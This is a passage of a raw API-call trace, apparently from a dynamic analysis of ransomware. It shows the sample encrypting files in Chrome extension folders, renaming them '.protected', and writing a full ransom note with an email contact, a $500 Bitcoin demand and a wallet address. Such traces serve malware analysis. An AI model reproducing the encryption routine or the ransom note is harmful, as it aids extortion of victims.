(lpString1=".", lpString2="Windows") returned -1 [0080.197] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.197] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.197] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.197] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.197] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\.") returned 143 [0080.197] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.197] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.197] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.197] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.197] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.198] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.198] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.198] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\..") returned 144 [0080.198] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.198] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.198] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.198] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.198] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.198] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.198] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.198] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.198] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.199] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.199] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.199] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.199] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.200] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.200] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.200] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.200] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.200] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.200] CloseHandle (hObject=0x168) returned 1 [0080.200] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.protected") returned 165 [0080.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.protected")) returned 1 [0080.201] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.201] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.201] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0080.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.202] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.202] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.202] lstrlenA (lpString="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") returned 684 [0080.202] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.202] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.202] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.202] CloseHandle (hObject=0x164) returned 1 [0080.203] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0080.203] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi") returned 141 [0080.203] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0080.203] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0080.203] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*") returned 143 [0080.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.203] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.203] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.203] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.203] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.203] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\.") returned 143 [0080.203] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.203] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.203] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.203] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.203] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.203] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.203] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\..") returned 144 [0080.203] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.203] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.203] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.203] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.203] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.203] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.204] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.204] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.204] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.204] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.204] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.204] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.205] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.205] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.205] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.205] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.205] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.206] CloseHandle (hObject=0x168) returned 1 [0080.206] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.protected") returned 165 [0080.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.protected")) returned 1 [0080.206] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.206] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.206] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0080.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.207] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.207] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.208] lstrlenA (lpString="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") returned 684 [0080.208] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.208] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.208] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.208] CloseHandle (hObject=0x164) returned 1 [0080.208] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0080.208] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN") returned 144 [0080.208] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0080.208] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0080.208] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*") returned 146 [0080.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0080.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.208] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.208] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.208] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.208] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.208] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\.") returned 146 [0080.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.208] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.209] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.209] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.209] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.209] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.209] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\..") returned 147 [0080.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.209] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.209] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.209] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.209] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.209] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.209] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | 